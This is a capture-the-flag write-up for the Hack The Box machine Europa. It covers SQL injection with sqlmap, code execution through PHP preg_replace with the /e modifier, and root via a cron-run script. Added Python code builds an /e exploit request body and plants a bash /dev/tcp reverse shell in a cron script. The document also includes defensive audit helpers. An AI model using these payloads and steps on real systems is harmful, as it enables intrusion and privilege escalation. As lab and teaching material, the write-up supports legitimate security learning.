Saturday, February 2, 2019
Europa
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Europa, which is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- Europa's IP is 10.10.10.22:
- Scanning with Nmap:
- Going deeper with the scanning:
- So there are two domains that should be added to the /etc/hosts file:
- sslyze is also able to find both domains:
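- Added example (my own helper, not code from the original post): both nmap's TLS output and sslyze read the server certificate, so the hostnames to put in /etc/hosts normally come from its Subject CN and subjectAltName entries. This script pulls those names out of `openssl x509 -text` output and turns them into /etc/hosts lines for the target IP. The certificate text and the `example.htb` names below are constructed placeholders, not the real ones from the box.

```python
"""Extract hostnames from an X.509 certificate dump and emit /etc/hosts lines."""
import re
import subprocess

# Constructed sample of `openssl x509 -noout -text` output (placeholder names).
SAMPLE_CERT_TEXT = """\
Certificate:
    Data:
        Issuer: C=XX, O=Example Corp, CN=example.htb
        Subject: C=XX, O=Example Corp, CN=example.htb
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:www.example.htb, DNS:admin-portal.example.htb
"""

_CN = re.compile(r"\bCN\s*=\s*([A-Za-z0-9.*-]+)")
_DNS = re.compile(r"DNS:\s*([A-Za-z0-9.*-]+)")


def cert_hostnames(cert_text):
    """Distinct hostnames in the dump, CN entries first then SAN entries.
    Wildcards (*.example.htb) are skipped: they cannot go in /etc/hosts."""
    names = []
    for rx in (_CN, _DNS):
        for name in rx.findall(cert_text):
            if name.startswith("*") or name in names:
                continue
            names.append(name)
    return names


def hosts_entries(ip, names):
    """One /etc/hosts line per hostname so each vhost can be requested by name."""
    return [f"{ip}\t{name}" for name in names]


def fetch_cert_text(host, port=443):
    """Grab the live certificate with the openssl CLI (network; not run by the test)."""
    pem = subprocess.run(
        ["openssl", "s_client", "-connect", f"{host}:{port}", "-servername", host],
        input=b"", capture_output=True, timeout=15, check=False,
    ).stdout
    return subprocess.run(
        ["openssl", "x509", "-noout", "-text"],
        input=pem, capture_output=True, check=True,
    ).stdout.decode()


if __name__ == "__main__":
    # Against the box: fetch_cert_text("10.10.10.22") instead of the sample.
    for line in hosts_entries("10.10.10.22", cert_hostnames(SAMPLE_CERT_TEXT)):
        print(line)
```

Append the printed lines to /etc/hosts (as root) and the virtual hosts become reachable by name; without them the web server only answers for the default site.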
- Connecting to admin-portal we find a login form:
3 - EXPLOITATION
- The exploitation process consists of two steps:
3.1 - Database exploitation
- Let's start by using sqlmap to probe the admin portal's login form for SQL injection and enumerate any backend database:
- sqlmap offers many options; for instance:
- Launching sqlmap against Europa's administrator portal we find two databases:
- Dumping everything from the admin database:
- Cracking the password hash, which is the same for both users:
- Now we can log in to the admin-portal with admin's email and his password SuperSecretPassword!
3.2 - PHP code exploitation
- Once logged in, the dashboard has a Tools tab:
- Going to Tools we find a VPN generator script:
- Intercepting the VPN generation with Burp:
- So there is a parameter called pattern, which is passed to the PHP function preg_replace as the regular expression, like this:
- One of the PCRE pattern modifiers is e (PREG_REPLACE_EVAL), deprecated in PHP 5.5 and removed in PHP 7.0 because of the code-execution risk it carries:
- As said before, the modifier e is the origin of this vulnerability:
- Here is another interesting explanation about this vulnerability:
http://www.madirish.net/402
- So what the e modifier does is make preg_replace evaluate the replacement string as PHP code for every match (after substituting back-references) instead of inserting it literally.
- Since the pattern is user-controlled, we can append the e modifier to the pattern parameter so that whatever we send as the replacement is executed as PHP:
- Sending the request to Burp Repeater, let's try to read /etc/passwd:
- Now, generating a reverse-shell payload with msfvenom:
- URL-encoding it:
- Adding it to the Burp request:
- Setting up a listener:
- Finally, sending the request from Repeater gives us a reverse shell:
- Upgrading the shell:
- The current user is www-data:
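- Added example (my own code, not from the original post or the application) for the preg_replace /e procedure above. Only the `pattern` parameter is named on the page; the replacement parameter `ipaddress`, the subject parameter `text`, the placeholder token `ip_address`, the path /dashboard.php and the cookie handling are assumptions for illustration. `build_poc_body()` produces the URL-encoded POST body that appends /e to the user-controlled pattern so the replacement is evaluated as PHP; `find_risky_preg_replace()` is the matching source-audit check for the defending side, generalised beyond this box: it flags preg_replace calls whose pattern literal carries the e modifier and, more importantly, calls whose pattern is not a literal at all, because on PHP before 7.0 whoever controls the pattern can add /e themselves.

```python
"""PoC body builder and source audit for preg_replace() with the /e modifier."""
import re
import ssl
import urllib.parse
import urllib.request


def build_poc_body(php_expr, placeholder="ip_address"):
    """URL-encoded form body. Parameter names other than `pattern` are assumed."""
    params = {
        # pattern: the delimiter pair the app expects, plus the e modifier
        "pattern": f"/{placeholder}/e",
        # replacement: with /e this string is eval()'d once per match
        "ipaddress": php_expr,
        # subject: must contain the placeholder, otherwise nothing matches
        # and the replacement is never evaluated
        "text": placeholder,
    }
    return urllib.parse.urlencode(params)


def send_poc(url, cookie, body, timeout=10):
    """POST the body with the logged-in session cookie. Certificate checks are
    off because the lab host is self-signed. Network call; not run by the test."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        url, data=body.encode(), method="POST",
        headers={"Cookie": cookie,
                 "Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.read().decode(errors="replace")


# first argument of a preg_replace() call: a quoted literal or anything up to the comma
_CALL = re.compile(r"""preg_replace\s*\(\s*(?P<arg>'[^']*'|"[^"]*"|[^,)]+)\s*,""")
# quoted PCRE literal: quote, delimiter, body, same delimiter, modifiers, quote
_LITERAL = re.compile(
    r"""^(['"])(?P<delim>[^\w\s\\])(?P<body>.*)(?P=delim)(?P<mods>[A-Za-z]*)\1$"""
)


def find_risky_preg_replace(php_source):
    """(line, reason) for every preg_replace() whose pattern is user-controllable
    or already carries /e. One call per line is assumed to be enough for an audit."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for call in _CALL.finditer(line):
            arg = call.group("arg").strip()
            lit = _LITERAL.match(arg)
            if lit is None:
                findings.append((lineno, f"pattern is not a literal: {arg}"))
            elif "e" in lit.group("mods"):
                findings.append((lineno, f"pattern literal uses the e modifier: {arg}"))
    return findings


# Constructed PHP fragment for the audit (not the application's real code).
PHP_SAMPLE = r"""<?php
$out  = preg_replace($_POST['pattern'], $_POST['ipaddress'], $_POST['text']);
$safe = preg_replace('/\s+/', ' ', $text);
$bad  = preg_replace('/(\w+)/e', 'strtoupper("\1")', $text);
"""

if __name__ == "__main__":
    print(build_poc_body("system('id')"))
    print(build_poc_body("file_get_contents('/etc/passwd')"))
    for lineno, why in find_risky_preg_replace(PHP_SAMPLE):
        print(f"line {lineno}: {why}")
    # e.g. send_poc("https://admin-portal.../dashboard.php", "PHPSESSID=...", body)
```

The fix on the application side is the same one PHP 7 forced on everyone: never let the caller supply the pattern, and replace `/e` with `preg_replace_callback` when the replacement really has to compute something.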
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- Looking at the crontab jobs, there is one called clearlogs run every minute as root, which is worth examining:
- Reading clearlogs:
- clearlogs invokes a script called logcleared.sh, so what we need to do is put code of our choosing into logcleared.sh.
- In fact, logcleared.sh does not even exist yet, so it must be created from scratch:
- msfvenom helps again, this time with a different port than before:
- Setting up a listener on port 6666:
- Echoing the payload into logcleared.sh:
- The script is successfully created:
- Making it executable:
- Note that if we run the script ourselves instead of waiting for the cron interval, the shell comes back as www-data (not root), so we still have a low-privilege shell:
- However, closing that session, starting a new listener and waiting for cron to run logcleared.sh as root, we finally get a root reverse shell:
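- Added example (my own code, not from the original post) that generalises the cron step above: it parses a system crontab, follows each root job one level into the script it runs (that is how clearlogs leads to logcleared.sh), and reports scripts that are missing but creatable, or present and writable, by the current user; then it drops the payload and makes it executable. The page does not give the directory of logcleared.sh, so the demo fixture uses a temporary directory; the payload is a plain bash reverse shell instead of the msfvenom output the page uses, and the listener address 10.10.14.2 is an assumption. Run the audit from the www-data shell, since what matters is what that user can write; and as the page notes, the root shell only arrives when cron runs the script, not when you run it yourself.

```python
"""Audit root cron jobs for writable or missing scripts, then drop a payload."""
import os
import re
import stat
import tempfile

# a system crontab line: five schedule fields, the user, then the command
_CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
# absolute paths inside a command or script body
_ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")


def parse_system_crontab(text):
    """(user, command) pairs; skips comments, blanks, VAR=value lines and
    @reboot-style entries, which have no five-field schedule."""
    jobs = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue
        m = _CRON_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd").strip()))
    return jobs


def referenced_scripts(cmd):
    """Absolute paths in the command, plus the absolute paths named inside any
    of them that is a readable regular file (one level deep)."""
    paths = _ABS_PATH.findall(cmd)
    for p in list(paths):
        if not os.path.isfile(p):
            continue
        try:
            with open(p, encoding="utf-8", errors="replace") as fh:
                body = fh.read(65536)
        except OSError:
            continue
        for inner in _ABS_PATH.findall(body):
            if inner not in paths:
                paths.append(inner)
    return paths


def audit_root_jobs(crontab_text, exists=os.path.exists, writable=None):
    """(path, reason) for every script a root job reaches that we can plant
    (missing, parent directory writable) or replace (present and writable)."""
    if writable is None:
        writable = lambda p: os.access(p, os.W_OK)  # noqa: E731
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in referenced_scripts(cmd):
            if not exists(path):
                if writable(os.path.dirname(path) or "/"):
                    findings.append((path, "missing; parent directory writable, create it"))
            elif writable(path):
                findings.append((path, "exists and writable, overwrite it"))
    return findings


def write_payload(path, listener_ip, listener_port):
    """Drop a bash reverse shell and mark it executable (the page's chmod step)."""
    script = f"#!/bin/bash\nbash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1\n"
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(script)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return script


def build_demo(workdir=None):
    """Constructed fixture mirroring the box: a root job runs `clearlogs`, which
    calls a logcleared.sh that does not exist yet. Returns (crontab, missing)."""
    workdir = workdir or tempfile.mkdtemp(prefix="cronaudit-")
    runner = os.path.join(workdir, "clearlogs")
    missing = os.path.join(workdir, "logcleared.sh")
    with open(runner, "w", encoding="utf-8") as fh:
        fh.write(f"#!/bin/bash\n{missing}\n")
    os.chmod(runner, 0o755)
    return f"* * * * * root {runner}\n", missing


if __name__ == "__main__":
    # On the box: open("/etc/crontab").read() instead of the fixture.
    crontab, missing = build_demo()
    for path, why in audit_root_jobs(crontab):
        print(path, "->", why)
    write_payload(missing, "10.10.14.2", 6666)  # then: nc -lvnp 6666 and wait a minute
```

If the audit is run as root everything shows up as writable, which is why it belongs in the low-privilege shell; the interesting finding is a path reachable from a root job that www-data can create or change.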
6 - READING THE 2nd FLAG
- Reading root.txt: